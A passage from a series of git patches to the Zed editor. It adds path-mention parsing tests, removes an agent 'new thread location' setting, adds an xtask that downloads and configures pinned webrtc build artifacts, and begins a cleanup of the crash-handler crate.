parse_line_range(fragment).ok()) { + return Ok(MentionUri::Selection { + 
abs_path: Some(path_input.into()), + line_range: fragment, + }); + } + + let path_with_position = PathWithPosition::parse_str(path_input); + let abs_path = path_with_position.path; + if let Some(row) = path_with_position.row { + let line = row + .checked_sub(1) + .context("Line numbers should be 1-based")?; + // TODO: Preserve column info too. + Ok(MentionUri::Selection { + abs_path: Some(abs_path), + line_range: line..=line, + }) + } else { + Ok(MentionUri::File { abs_path }) + } + }; + + if is_absolute(input, path_style) && !input.contains("://") { + return parse_absolute_path(input) + .with_context(|| format!("Invalid absolute path mention URI: {input}")); + } + let url = url::Url::parse(input)?; let path = url.path(); match url.scheme() { @@ -737,6 +778,153 @@ mod tests { assert!(MentionUri::parse("zed:///agent/unknown/test", PathStyle::local()).is_err()); } + #[test] + fn test_parse_absolute_file_path() { + let file_path = path!("/path/to/file.rs"); + let parsed = MentionUri::parse(file_path, PathStyle::local()).unwrap(); + match &parsed { + MentionUri::File { abs_path } => { + assert_eq!(abs_path, Path::new(file_path)); + } + _ => panic!("Expected File variant"), + } + } + + #[test] + fn test_parse_absolute_file_path_with_row() { + let file_path = "/path/to/file.rs:42"; + let parsed = MentionUri::parse(file_path, PathStyle::Posix).unwrap(); + match &parsed { + MentionUri::Selection { + abs_path: path, + line_range, + } => { + assert_eq!(path.as_ref().unwrap(), Path::new("/path/to/file.rs")); + assert_eq!(line_range.start(), &41); + assert_eq!(line_range.end(), &41); + } + _ => panic!("Expected Selection variant"), + } + } + + #[test] + fn test_parse_absolute_file_path_with_fragment_line() { + let file_path = "/path/to/file.rs#L42"; + let parsed = MentionUri::parse(file_path, PathStyle::Posix).unwrap(); + match &parsed { + MentionUri::Selection { + abs_path: path, + line_range, + } => { + assert_eq!(path.as_ref().unwrap(), Path::new("/path/to/file.rs")); + 
assert_eq!(line_range.start(), &41); + assert_eq!(line_range.end(), &41); + } + _ => panic!("Expected Selection variant"), + } + } + + #[test] + fn test_parse_absolute_windows_path() { + let file_path = "C:\\Users\\zed\\project\\main.rs"; + let parsed = MentionUri::parse(file_path, PathStyle::Windows).unwrap(); + match &parsed { + MentionUri::File { abs_path } => { + assert_eq!(abs_path, Path::new("C:\\Users\\zed\\project\\main.rs")); + } + _ => panic!("Expected File variant"), + } + } + + #[test] + fn test_parse_absolute_windows_file_path_with_row() { + let file_path = "C:\\Users\\zed\\project\\main.rs:42"; + let parsed = MentionUri::parse(file_path, PathStyle::Windows).unwrap(); + match &parsed { + MentionUri::Selection { + abs_path: path, + line_range, + } => { + assert_eq!( + path.as_ref().unwrap(), + Path::new("C:\\Users\\zed\\project\\main.rs") + ); + assert_eq!(line_range.start(), &41); + assert_eq!(line_range.end(), &41); + } + _ => panic!("Expected Selection variant"), + } + } + + #[test] + fn test_parse_absolute_windows_file_path_with_fragment_line() { + let file_path = "C:\\Users\\zed\\project\\main.rs#L42"; + let parsed = MentionUri::parse(file_path, PathStyle::Windows).unwrap(); + match &parsed { + MentionUri::Selection { + abs_path: path, + line_range, + } => { + assert_eq!( + path.as_ref().unwrap(), + Path::new("C:\\Users\\zed\\project\\main.rs") + ); + assert_eq!(line_range.start(), &41); + assert_eq!(line_range.end(), &41); + } + _ => panic!("Expected Selection variant"), + } + } + + #[test] + fn test_parse_backticked_absolute_file_path() { + let file_path = "`/path/to/file.rs`"; + let parsed = MentionUri::parse(file_path, PathStyle::Posix).unwrap(); + match &parsed { + MentionUri::File { abs_path } => { + assert_eq!(abs_path, Path::new("/path/to/file.rs")); + } + _ => panic!("Expected File variant"), + } + } + + #[test] + fn test_parse_backticked_absolute_file_path_with_fragment_line() { + let file_path = "`/path/to/file.rs#L42`"; + let parsed = 
MentionUri::parse(file_path, PathStyle::Posix).unwrap(); + match &parsed { + MentionUri::Selection { + abs_path: path, + line_range, + } => { + assert_eq!(path.as_ref().unwrap(), Path::new("/path/to/file.rs")); + assert_eq!(line_range.start(), &41); + assert_eq!(line_range.end(), &41); + } + _ => panic!("Expected Selection variant"), + } + } + + #[test] + fn test_parse_backticked_absolute_windows_file_path_with_fragment_line() { + let file_path = "`C:\\Users\\zed\\project\\main.rs#L42`"; + let parsed = MentionUri::parse(file_path, PathStyle::Windows).unwrap(); + match &parsed { + MentionUri::Selection { + abs_path: path, + line_range, + } => { + assert_eq!( + path.as_ref().unwrap(), + Path::new("C:\\Users\\zed\\project\\main.rs") + ); + assert_eq!(line_range.start(), &41); + assert_eq!(line_range.end(), &41); + } + _ => panic!("Expected Selection variant"), + } + } + #[test] fn test_single_line_number() { // https://github.com/zed-industries/zed/issues/46114 From 201516607db69b2eb7c3a4918cb11c1ae83b7d36 Mon Sep 17 00:00:00 2001 From: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com> Date: Sun, 3 May 2026 21:30:04 +0200 Subject: [PATCH 142/231] agent: Remove new thread location setting (#55575) cc: @danilo-leal This setting is from when we had the git worktree picker in the agent panel, now that it is in the menu bar it doesn't make sense to keep it. 
We plan to add a similar feature in the future to handle the "new thread == new git worktree" workflow Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --- assets/settings/default.json | 4 --- crates/agent/src/tool_permissions.rs | 1 - crates/agent_settings/src/agent_settings.rs | 4 +-- crates/agent_ui/src/agent_ui.rs | 1 - crates/agent_ui/src/conversation_view.rs | 8 ++---- crates/settings_content/src/agent.rs | 32 --------------------- crates/settings_ui/src/page_data.rs | 23 --------------- crates/settings_ui/src/settings_ui.rs | 1 - 8 files changed, 3 insertions(+), 71 deletions(-) diff --git a/assets/settings/default.json b/assets/settings/default.json index d2bec7226627e2..54b9070da2be39 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -1152,10 +1152,6 @@ "tools": {}, }, }, - // Whether to start a new thread in the current local project or in a new Git worktree. - // - // Default: local_project - "new_thread_location": "local_project", // Where to show notifications when the agent has either completed // its response, or else needs confirmation before it can run a // tool action. 
diff --git a/crates/agent/src/tool_permissions.rs b/crates/agent/src/tool_permissions.rs index 65cbcfb2c609cb..2d3638265f758f 100644 --- a/crates/agent/src/tool_permissions.rs +++ b/crates/agent/src/tool_permissions.rs @@ -597,7 +597,6 @@ mod tests { tool_permissions, show_turn_stats: false, show_merge_conflict_indicator: true, - new_thread_location: Default::default(), sidebar_side: Default::default(), thinking_display: Default::default(), } diff --git a/crates/agent_settings/src/agent_settings.rs b/crates/agent_settings/src/agent_settings.rs index 5dd939c4ad1d5d..37648997c3bb43 100644 --- a/crates/agent_settings/src/agent_settings.rs +++ b/crates/agent_settings/src/agent_settings.rs @@ -13,7 +13,7 @@ use project::DisableAiSettings; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; use settings::{ - DockPosition, DockSide, LanguageModelParameters, LanguageModelSelection, NewThreadLocation, + DockPosition, DockSide, LanguageModelParameters, LanguageModelSelection, NotifyWhenAgentWaiting, PlaySoundWhenAgentDone, RegisterSetting, Settings, SettingsContent, SettingsStore, SidebarDockPosition, SidebarSide, ThinkingBlockDisplay, ToolPermissionMode, update_settings_file, update_settings_file_with_completion, @@ -167,7 +167,6 @@ pub struct AgentSettings { pub show_turn_stats: bool, pub show_merge_conflict_indicator: bool, pub tool_permissions: ToolPermissions, - pub new_thread_location: NewThreadLocation, } impl AgentSettings { @@ -671,7 +670,6 @@ impl Settings for AgentSettings { show_turn_stats: agent.show_turn_stats.unwrap(), show_merge_conflict_indicator: agent.show_merge_conflict_indicator.unwrap(), tool_permissions: compile_tool_permissions(agent.tool_permissions), - new_thread_location: agent.new_thread_location.unwrap_or_default(), } } } diff --git a/crates/agent_ui/src/agent_ui.rs b/crates/agent_ui/src/agent_ui.rs index 449194a738070f..226471fc024294 100644 --- a/crates/agent_ui/src/agent_ui.rs +++ b/crates/agent_ui/src/agent_ui.rs @@ -713,7 +713,6 
@@ mod tests { tool_permissions: Default::default(), show_turn_stats: false, show_merge_conflict_indicator: true, - new_thread_location: Default::default(), sidebar_side: Default::default(), thinking_display: Default::default(), }; diff --git a/crates/agent_ui/src/conversation_view.rs b/crates/agent_ui/src/conversation_view.rs index c6ce183863ba84..c1a975939f6275 100644 --- a/crates/agent_ui/src/conversation_view.rs +++ b/crates/agent_ui/src/conversation_view.rs @@ -48,8 +48,7 @@ use crate::DEFAULT_THREAD_TITLE; use crate::message_editor::SessionCapabilities; use rope::Point; use settings::{ - NewThreadLocation, NotifyWhenAgentWaiting, Settings as _, SettingsStore, SidebarSide, - ThinkingBlockDisplay, + NotifyWhenAgentWaiting, Settings as _, SettingsStore, SidebarSide, ThinkingBlockDisplay, }; use std::path::Path; use std::sync::Arc; @@ -862,10 +861,7 @@ impl ConversationView { SidebarSide::Left => "left", SidebarSide::Right => "right", }; - let thread_location = match AgentSettings::get_global(cx).new_thread_location { - NewThreadLocation::LocalProject => "current_worktree", - NewThreadLocation::NewWorktree => "new_worktree", - }; + let thread_location = "current_worktree"; let load_task = cx.spawn_in(window, async move |this, cx| { let connection = match connect_result.await { diff --git a/crates/settings_content/src/agent.rs b/crates/settings_content/src/agent.rs index 2cdeb1e94e1a0b..26b563e0842708 100644 --- a/crates/settings_content/src/agent.rs +++ b/crates/settings_content/src/agent.rs @@ -9,30 +9,6 @@ use crate::ExtendingVec; use crate::DockPosition; -/// Where new threads should start by default. -#[derive( - Clone, - Copy, - Debug, - Default, - PartialEq, - Eq, - Serialize, - Deserialize, - JsonSchema, - MergeFrom, - strum::VariantArray, - strum::VariantNames, -)] -#[serde(rename_all = "snake_case")] -pub enum NewThreadLocation { - /// Start threads in the current project. - #[default] - LocalProject, - /// Start threads in a new worktree. 
- NewWorktree, -} - /// Where to position the threads sidebar. #[derive( Clone, @@ -161,10 +137,6 @@ pub struct AgentSettingsContent { /// /// Default: write pub default_profile: Option>, - /// Where new threads should start by default. - /// - /// Default: "local_project" - pub new_thread_location: Option, /// The available agent profiles. pub profiles: Option, AgentProfileContent>>, /// Where to show a popup notification when the agent is waiting for user input. @@ -270,10 +242,6 @@ impl AgentSettingsContent { self.default_profile = Some(profile_id); } - pub fn set_new_thread_location(&mut self, value: NewThreadLocation) { - self.new_thread_location = Some(value); - } - pub fn add_favorite_model(&mut self, model: LanguageModelSelection) { // Note: this is intentional to not compare using `PartialEq`here. // Full equality would treat entries that differ just in thinking/effort/speed diff --git a/crates/settings_ui/src/page_data.rs b/crates/settings_ui/src/page_data.rs index 99dd77b84aebb4..112aa5f5716563 100644 --- a/crates/settings_ui/src/page_data.rs +++ b/crates/settings_ui/src/page_data.rs @@ -7429,29 +7429,6 @@ fn ai_page(cx: &App) -> SettingsPage { }), ]; - items.push(SettingsPageItem::SettingItem(SettingItem { - title: "New Thread Location", - description: "Whether to start a new thread in the current local project or in a new Git worktree.", - field: Box::new(SettingField { - json_path: Some("agent.new_thread_location"), - pick: |settings_content| { - settings_content - .agent - .as_ref()? 
- .new_thread_location - .as_ref() - }, - write: |settings_content, value, _| { - settings_content - .agent - .get_or_insert_default() - .new_thread_location = value; - }, - }), - metadata: None, - files: USER, - })); - items.extend([ SettingsPageItem::SettingItem(SettingItem { title: "Single File Review", diff --git a/crates/settings_ui/src/settings_ui.rs b/crates/settings_ui/src/settings_ui.rs index a718e1277efca6..d22687b0b757d4 100644 --- a/crates/settings_ui/src/settings_ui.rs +++ b/crates/settings_ui/src/settings_ui.rs @@ -530,7 +530,6 @@ fn init_renderers(cx: &mut App) { .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) - .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) From 0e1a9f028f5d67815fd2e59115e3e170c0d3ce29 Mon Sep 17 00:00:00 2001 From: Piotr Osiewicz <24362066+osiewicz@users.noreply.github.com> Date: Mon, 4 May 2026 08:22:51 +0200 Subject: [PATCH 143/231] =?UTF-8?q?build:=20Allow=20pinning=20of=20webrtc?= =?UTF-8?q?=20build=20artifacts=20(=E2=9C=88=EF=B8=8F=20edition)=20(#55336?= =?UTF-8?q?)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit tl;dr: you can now run `cargo xtask setup_webrtc`, which: 1. Fetches webrtc artifacts into a gitignored directory in Zed repo 2. Adds a [env] section to `~/.cargo/config.toml` on your box which forces LK to NOT download webrtc artifacts as a part of its build script The end result: `cargo clean` is no longer a horrid experience with in horrid network environments. Caveats: 1. This does not handle appending to existing cargo config. The setup script will fail if there's one in place. 2. You need to redo this thing (fetch env var and whatnot) whenever LK version is bumped. 3. This is not mandatory for builds to work. 
You only really have to do this for your own convenience, but builds will work just fine without it (unless your connection sucks). Self-Review Checklist: - [ ] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [ ] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --- .gitignore | 1 + tooling/xtask/src/main.rs | 3 + tooling/xtask/src/tasks.rs | 1 + tooling/xtask/src/tasks/setup_webrtc.rs | 249 ++++++++++++++++++++++++ 4 files changed, 254 insertions(+) create mode 100644 tooling/xtask/src/tasks/setup_webrtc.rs diff --git a/.gitignore b/.gitignore index ba6b74f6c54b5f..becb768d270acd 100644 --- a/.gitignore +++ b/.gitignore @@ -2,6 +2,7 @@ **/*.proptest-regressions **/cargo-target **/target +.webrtc-sys/ **/venv **/.direnv *.wasm diff --git a/tooling/xtask/src/main.rs b/tooling/xtask/src/main.rs index c442f1c509e281..655401af75929c 100644 --- a/tooling/xtask/src/main.rs +++ b/tooling/xtask/src/main.rs @@ -21,6 +21,8 @@ enum CliCommand { PackageConformity(tasks::package_conformity::PackageConformityArgs), /// Publishes GPUI and its dependencies to crates.io. PublishGpui(tasks::publish_gpui::PublishGpuiArgs), + /// Downloads the pinned `webrtc-sys` release and configures `LK_CUSTOM_WEBRTC`. + SetupWebrtc(tasks::setup_webrtc::SetupWebrtcArgs), /// Builds GPUI web examples and serves them. 
WebExamples(tasks::web_examples::WebExamplesArgs), Workflows(tasks::workflows::GenerateWorkflowArgs), @@ -38,6 +40,7 @@ fn main() -> Result<()> { tasks::package_conformity::run_package_conformity(args) } CliCommand::PublishGpui(args) => tasks::publish_gpui::run_publish_gpui(args), + CliCommand::SetupWebrtc(args) => tasks::setup_webrtc::run_setup_webrtc(args), CliCommand::WebExamples(args) => tasks::web_examples::run_web_examples(args), CliCommand::Workflows(args) => tasks::workflows::run_workflows(args), CliCommand::CheckWorkflows(args) => tasks::workflow_checks::validate(args), diff --git a/tooling/xtask/src/tasks.rs b/tooling/xtask/src/tasks.rs index ea67d0abc5fcbd..affde2565c403c 100644 --- a/tooling/xtask/src/tasks.rs +++ b/tooling/xtask/src/tasks.rs @@ -3,6 +3,7 @@ pub mod compliance; pub mod licenses; pub mod package_conformity; pub mod publish_gpui; +pub mod setup_webrtc; pub mod web_examples; pub mod workflow_checks; pub mod workflows; diff --git a/tooling/xtask/src/tasks/setup_webrtc.rs b/tooling/xtask/src/tasks/setup_webrtc.rs new file mode 100644 index 00000000000000..756a37678388ba --- /dev/null +++ b/tooling/xtask/src/tasks/setup_webrtc.rs @@ -0,0 +1,249 @@ +#![allow(clippy::disallowed_methods, reason = "tooling is exempt")] + +use std::fs; +use std::path::{Path, PathBuf}; +use std::process::Command; + +use anyhow::{Context as _, Result, bail}; +use cargo_toml::Manifest; +use clap::Parser; +use regex::Regex; +use toml_edit::{DocumentMut, Item, Table, value}; + +use crate::workspace::load_workspace; + +const GITIGNORE_ENTRY: &str = ".webrtc-sys/"; +const LOCAL_DIR_NAME: &str = ".webrtc-sys"; +const ENV_VAR: &str = "LK_CUSTOM_WEBRTC"; + +#[derive(Parser)] +pub struct SetupWebrtcArgs { + /// Re-download even if the target directory already exists. + #[arg(long)] + force: bool, + + /// Override the host triple component used for the release artifact + /// (e.g. `mac-arm64-release`). Defaults to the current host. 
+ #[arg(long)] + triple: Option, + + /// Skip writing to `~/.cargo/config.toml`. Useful when you only want the + /// archive on disk and intend to set `LK_CUSTOM_WEBRTC` yourself. + #[arg(long)] + no_cargo_config: bool, +} + +pub fn run_setup_webrtc(args: SetupWebrtcArgs) -> Result<()> { + let metadata = load_workspace()?; + let workspace_root = metadata.workspace_root.as_std_path().to_path_buf(); + + let rev = read_webrtc_sys_rev(&workspace_root)?; + eprintln!("Pinned livekit-rust-sdks rev: {rev}"); + + let tag = fetch_webrtc_tag(&rev)?; + eprintln!("WEBRTC_TAG for that rev: {tag}"); + + let triple = match args.triple { + Some(triple) => triple, + None => host_webrtc_triple()?, + }; + eprintln!("Target triple: {triple}"); + + let local_root = workspace_root.join(LOCAL_DIR_NAME); + let tag_dir = local_root.join(&tag); + let extracted_dir = tag_dir.join(&triple); + + if extracted_dir.exists() && !args.force { + eprintln!( + "Already present at {}, skipping download.", + extracted_dir.display() + ); + } else { + if extracted_dir.exists() { + fs::remove_dir_all(&extracted_dir) + .with_context(|| format!("removing stale {}", extracted_dir.display()))?; + } + fs::create_dir_all(&tag_dir).with_context(|| format!("creating {}", tag_dir.display()))?; + download_and_extract(&tag, &triple, &tag_dir)?; + } + + let absolute = extracted_dir + .canonicalize() + .with_context(|| format!("canonicalizing {}", extracted_dir.display()))?; + + ensure_gitignore_entry(&workspace_root)?; + + if args.no_cargo_config { + eprintln!( + "Skipping ~/.cargo/config.toml update. Set {ENV_VAR}={} yourself.", + absolute.display() + ); + } else { + update_cargo_config(&absolute)?; + } + + eprintln!(); + eprintln!("Done. 
{ENV_VAR} -> {}", absolute.display()); + Ok(()) +} + +fn read_webrtc_sys_rev(workspace_root: &Path) -> Result { + let manifest_path = workspace_root.join("Cargo.toml"); + let manifest = Manifest::from_path(&manifest_path) + .with_context(|| format!("parsing {}", manifest_path.display()))?; + + let patch = manifest + .patch + .get("crates-io") + .context("workspace Cargo.toml has no [patch.crates-io] section")?; + let dep = patch + .get("webrtc-sys") + .context("[patch.crates-io] is missing webrtc-sys")?; + let detail = dep + .detail() + .context("webrtc-sys patch entry is not a table")?; + detail + .git + .as_ref() + .context("webrtc-sys patch is missing a git source")?; + detail + .rev + .clone() + .context("webrtc-sys patch is missing a `rev`") +} + +fn fetch_webrtc_tag(rev: &str) -> Result { + let url = format!( + "https://raw.githubusercontent.com/zed-industries/livekit-rust-sdks/{rev}/webrtc-sys/build/src/lib.rs" + ); + let body = curl_text(&url).with_context(|| format!("fetching {url}"))?; + + let re = + Regex::new(r#"pub\s+const\s+WEBRTC_TAG\s*:\s*&str\s*=\s*"([^"]+)""#).expect("static regex"); + let captures = re + .captures(&body) + .with_context(|| format!("could not find WEBRTC_TAG in {url}"))?; + Ok(captures[1].to_string()) +} + +fn host_webrtc_triple() -> Result { + let os = match std::env::consts::OS { + "macos" => "mac", + "linux" => "linux", + "windows" => "win", + other => bail!("unsupported host OS: {other}"), + }; + let arch = match std::env::consts::ARCH { + "aarch64" => "arm64", + "x86_64" => "x64", + other => bail!("unsupported host arch: {other}"), + }; + Ok(format!("{os}-{arch}-release")) +} + +fn download_and_extract(tag: &str, triple: &str, into: &Path) -> Result<()> { + let url = format!( + "https://github.com/zed-industries/livekit-rust-sdks/releases/download/{tag}/webrtc-{triple}.zip" + ); + let zip_path = into.join(format!("webrtc-{triple}.zip")); + + eprintln!("Downloading {url}"); + let status = Command::new("curl") + .args(["-fL", 
"--retry", "3", "--progress-bar", "-o"]) + .arg(&zip_path) + .arg(&url) + .status() + .context("running curl")?; + if !status.success() { + bail!("curl exited with {status} while downloading {url}"); + } + + eprintln!("Extracting into {}", into.display()); + let status = Command::new("unzip") + .arg("-q") + .arg("-o") + .arg(&zip_path) + .arg("-d") + .arg(into) + .status() + .context("running unzip")?; + if !status.success() { + bail!( + "unzip exited with {status} while extracting {}", + zip_path.display() + ); + } + + fs::remove_file(&zip_path).ok(); + Ok(()) +} + +fn curl_text(url: &str) -> Result { + let output = Command::new("curl") + .args(["-fsSL", url]) + .output() + .context("running curl")?; + if !output.status.success() { + bail!( + "curl failed for {url} (exit {}): {}", + output.status, + String::from_utf8_lossy(&output.stderr).trim(), + ); + } + String::from_utf8(output.stdout).context("curl returned non-UTF-8 body") +} + +fn ensure_gitignore_entry(workspace_root: &Path) -> Result<()> { + let path = workspace_root.join(".gitignore"); + let existing = + fs::read_to_string(&path).with_context(|| format!("reading {}", path.display()))?; + if existing + .lines() + .any(|line| line.trim() == GITIGNORE_ENTRY || line.trim() == LOCAL_DIR_NAME) + { + return Ok(()); + } + let mut updated = existing; + if !updated.ends_with('\n') { + updated.push('\n'); + } + updated.push_str(GITIGNORE_ENTRY); + updated.push('\n'); + fs::write(&path, updated).with_context(|| format!("writing {}", path.display()))?; + eprintln!("Added {GITIGNORE_ENTRY} to .gitignore"); + Ok(()) +} + +fn update_cargo_config(webrtc_path: &Path) -> Result<()> { + let home = std::env::var_os("HOME") + .or_else(|| std::env::var_os("USERPROFILE")) + .context("could not determine home directory")?; + let config_path = PathBuf::from(home).join(".cargo").join("config.toml"); + if config_path.exists() { + bail!( + "{} already exists; refusing to modify it. 
\ + Add `[env]\\n{ENV_VAR} = \"{}\"` yourself, \ + or re-run with --no-cargo-config.", + config_path.display(), + webrtc_path.display(), + ); + } + + if let Some(parent) = config_path.parent() { + fs::create_dir_all(parent).with_context(|| format!("creating {}", parent.display()))?; + } + + let mut doc = DocumentMut::new(); + let mut env_table = Table::new(); + env_table.set_implicit(false); + let path_str = webrtc_path + .to_str() + .context("webrtc path is not valid UTF-8")?; + env_table.insert(ENV_VAR, value(path_str)); + doc.insert("env", Item::Table(env_table)); + + fs::write(&config_path, doc.to_string()) + .with_context(|| format!("writing {}", config_path.display()))?; + eprintln!("Wrote {} with {ENV_VAR}={path_str}", config_path.display()); + Ok(()) +} From a28972fd2ebdda1346bd16609e5a6c38494f61f7 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Mon, 4 May 2026 08:30:47 +0200 Subject: [PATCH 144/231] Cleanup crashes crate (#54927) Self-Review Checklist: - [ ] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [ ] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A or Added/Fixed/Improved ... 
--- Cargo.lock | 10 +- Cargo.toml | 3 +- crates/crashes/Cargo.toml | 4 - crates/crashes/src/crashes.rs | 399 +++++++++++++----------- crates/feedback/Cargo.toml | 2 +- crates/feedback/src/feedback.rs | 10 +- crates/remote_server/src/main.rs | 2 +- crates/remote_server/src/server.rs | 93 ++++-- crates/system_specs/Cargo.toml | 1 - crates/system_specs/src/system_specs.rs | 14 +- crates/zed/src/main.rs | 106 +++++-- crates/zed/src/zed.rs | 8 +- 12 files changed, 375 insertions(+), 277 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 9bda3f999ce560..5242481f927a68 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -4097,9 +4097,9 @@ dependencies = [ [[package]] name = "crash-handler" -version = "0.6.3" +version = "0.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2066907075af649bcb8bcb1b9b986329b243677e6918b2d920aa64b0aac5ace3" +checksum = "0df5c9639f4942eb7702b964b3f9adf03a55724a57558cc177407388a8b936e2" dependencies = [ "cfg-if", "crash-context", @@ -4113,15 +4113,11 @@ name = "crashes" version = "0.1.0" dependencies = [ "async-process", - "cfg-if", "crash-handler", - "futures 0.3.32", "log", "mach2 0.5.0", "minidumper", "parking_lot", - "paths", - "release_channel", "serde", "serde_json", "system_specs", @@ -6260,6 +6256,7 @@ dependencies = [ name = "feedback" version = "0.1.0" dependencies = [ + "client", "extension_host", "gpui", "system_specs", @@ -17561,7 +17558,6 @@ name = "system_specs" version = "0.1.0" dependencies = [ "anyhow", - "client", "gpui", "human_bytes", "pciid-parser", diff --git a/Cargo.toml b/Cargo.toml index b526095e47c5eb..e613ed2e99afad 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -554,7 +554,7 @@ core-foundation = "=0.10.0" core-foundation-sys = "0.8.6" core-video = { version = "0.5.2", features = ["metal"] } cpal = "0.17" -crash-handler = "0.6" +crash-handler = "0.7" criterion = { version = "0.5", features = ["html_reports"] } ctor = "0.4.0" dap-types = { git = "https://github.com/zed-industries/dap-types", 
rev = "1b461b310481d01e02b2603c16d7144b926339f8" } @@ -914,6 +914,7 @@ wasmtime = { opt-level = 3 } cranelift-codegen = { opt-level = 3 } wasmtime-environ = { opt-level = 3 } wasmtime-internal-cranelift = { opt-level = 3 } +minidumper = { opt-level = 3 } # Build single-source-file crates with cg=1 as it helps make `cargo build` of a whole workspace a bit faster activity_indicator = { codegen-units = 1 } assets = { codegen-units = 1 } diff --git a/crates/crashes/Cargo.toml b/crates/crashes/Cargo.toml index 6886e5808aa542..f8b898112c1881 100644 --- a/crates/crashes/Cargo.toml +++ b/crates/crashes/Cargo.toml @@ -7,14 +7,10 @@ license = "GPL-3.0-or-later" [dependencies] async-process.workspace = true -cfg-if.workspace = true crash-handler.workspace = true -futures.workspace = true log.workspace = true minidumper.workspace = true parking_lot.workspace = true -paths.workspace = true -release_channel.workspace = true serde.workspace = true serde_json.workspace = true system_specs.workspace = true diff --git a/crates/crashes/src/crashes.rs b/crates/crashes/src/crashes.rs index 9abe7eb8b402f3..12c251e6f7ff5d 100644 --- a/crates/crashes/src/crashes.rs +++ b/crates/crashes/src/crashes.rs @@ -1,55 +1,42 @@ use crash_handler::{CrashEventResult, CrashHandler}; -use futures::future::BoxFuture; use log::info; -use minidumper::{Client, LoopAction, MinidumpBinary, Server, SocketName}; +use minidumper::{LoopAction, MinidumpBinary, Server, SocketName}; use parking_lot::Mutex; -use release_channel::{RELEASE_CHANNEL, ReleaseChannel}; use serde::{Deserialize, Serialize}; -use std::mem; +use std::{panic::Location, pin::Pin}; -#[cfg(not(target_os = "windows"))] -use async_process::Command; use system_specs::GpuSpecs; -#[cfg(target_os = "macos")] -use std::sync::atomic::AtomicU32; use std::{ env, fs::{self, File}, - io, - panic::{self, PanicHookInfo}, + io, panic, path::{Path, PathBuf}, process::{self}, sync::{ - Arc, OnceLock, + Arc, atomic::{AtomicBool, Ordering}, }, thread, 
time::Duration, }; -// set once the crash handler has initialized and the client has connected to it -static CRASH_HANDLER: OnceLock> = OnceLock::new(); -// set when the first minidump request is made to avoid generating duplicate crash reports -pub static REQUESTED_MINIDUMP: AtomicBool = AtomicBool::new(false); +pub use minidumper::Client; + const CRASH_HANDLER_PING_TIMEOUT: Duration = Duration::from_secs(60); const CRASH_HANDLER_CONNECT_TIMEOUT: Duration = Duration::from_secs(10); -static PENDING_CRASH_SERVER_MESSAGES: Mutex> = Mutex::new(Vec::new()); - -#[cfg(target_os = "macos")] -static PANIC_THREAD_ID: AtomicU32 = AtomicU32::new(0); - -fn should_install_crash_handler() -> bool { - if let Ok(value) = env::var("ZED_GENERATE_MINIDUMPS") { - return value == "true" || value == "1"; - } - - if *RELEASE_CHANNEL == ReleaseChannel::Dev { - return false; - } - - true +/// Force a backtrace to be printed on panic. +pub fn force_backtrace() { + let old_hook = panic::take_hook(); + panic::set_hook(Box::new(move |info| { + unsafe { env::set_var("RUST_BACKTRACE", "1") }; + old_hook(info); + // prevent the macOS crash dialog from popping up + if cfg!(target_os = "macos") { + std::process::exit(1); + } + })); } /// Install crash signal handlers and spawn the crash-handler subprocess. @@ -57,133 +44,125 @@ fn should_install_crash_handler() -> bool { /// The synchronous portion (signal handlers, panic hook) runs inline. /// The async keepalive task is passed to `spawn` so the caller decides /// which executor to schedule it on. 
-pub fn init + Send + Sync + 'static>( +pub fn init( crash_init: InitCrashHandler, - spawn: impl FnOnce(BoxFuture<'static, ()>), - wait_timer: impl (Fn(Duration) -> F) + Send + Sync + 'static, -) { - if !should_install_crash_handler() { - let old_hook = panic::take_hook(); - panic::set_hook(Box::new(move |info| { - unsafe { env::set_var("RUST_BACKTRACE", "1") }; - old_hook(info); - // prevent the macOS crash dialog from popping up - if cfg!(target_os = "macos") { - std::process::exit(1); - } - })); - return; - } - - panic::set_hook(Box::new(panic_hook)); - - let handler = CrashHandler::attach(unsafe { - crash_handler::make_crash_event(move |crash_context: &crash_handler::CrashContext| { - let Some(client) = CRASH_HANDLER.get() else { - return CrashEventResult::Handled(false); - }; - - // only request a minidump once - let res = if REQUESTED_MINIDUMP - .compare_exchange(false, true, Ordering::Acquire, Ordering::Relaxed) - .is_ok() - { - #[cfg(target_os = "macos")] - suspend_all_other_threads(); - - // on macos this "ping" is needed to ensure that all our - // `client.send_message` calls have been processed before we trigger the - // minidump request. - client.ping().ok(); - client.request_dump(crash_context).is_ok() - } else { - true - }; - CrashEventResult::Handled(res) - }) - }) - .expect("failed to attach signal handler"); - - info!("crash signal handlers installed"); - - spawn(Box::pin(connect_and_keepalive( - crash_init, handler, wait_timer, - ))); + spawn: S, + socket_path: P, + wait_timer: C, +) -> impl Future> + use +where + F: Future + Send + Sync + 'static, + C: (Fn(Duration) -> F) + Send + Sync + 'static, + S: FnOnce(Pin + Send + 'static>>), + P: FnOnce(u32) -> PathBuf, +{ + connect_and_keepalive(crash_init, socket_path, wait_timer, spawn) } /// Spawn the crash-handler subprocess, 